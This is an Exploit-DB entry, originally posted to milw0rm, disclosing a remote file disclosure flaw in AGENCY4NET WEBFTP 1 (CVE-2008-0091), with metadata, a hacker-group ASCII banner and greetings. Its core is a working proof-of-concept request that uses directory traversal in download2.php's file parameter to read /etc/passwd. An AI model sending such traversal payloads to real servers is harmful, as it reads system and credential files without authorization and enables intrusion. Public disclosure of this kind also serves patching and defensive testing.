AGENCY4NET WEBFTP 1 - 'download2.php' File Disclosure

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2007-12-31 
date_updated: 2016-11-08 
verified: 1 
codes: OSVDB-39878;CVE-2008-0091 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comagency4net_webftp_1_1.tar.gz

    ########                  ######              ####                ######  ######
  ##      ##                    ##                  ##                  ####  ####
  ##              ######        ##            ####  ##                  ####  ####
  ##            ##      ##      ##          ##    ####                  ##  ##  ##
  ##    ######  ##      ##      ##    ##    ##      ##                  ##      ##
  ##      ##    ##      ##      ##    ##    ##      ##                  ##      ##
    ######        ######      ##########      ##########              ######  ######
                                                        ##############

####################################################################################
###### AGENCY4NET WEBFTP 1 download2.php Remote File Disclosure Vulnerability  #####
###### http://sourceforge.net/project/platformdownload.php?group_id=206982     #####
###### POC :                                                                   #####
###### /Script/download2.php?file=../../../../../../../../../../../etc/passwd  #####
###### D0rk :  :(                                                              #####
###### TrYaG-TeaM [Tryag.com/cc], H-T Team , RoMaNcYxHaCkEr , Asb-May's Team   #####
####################################################################################

# milw0rm.com [2008-01-01]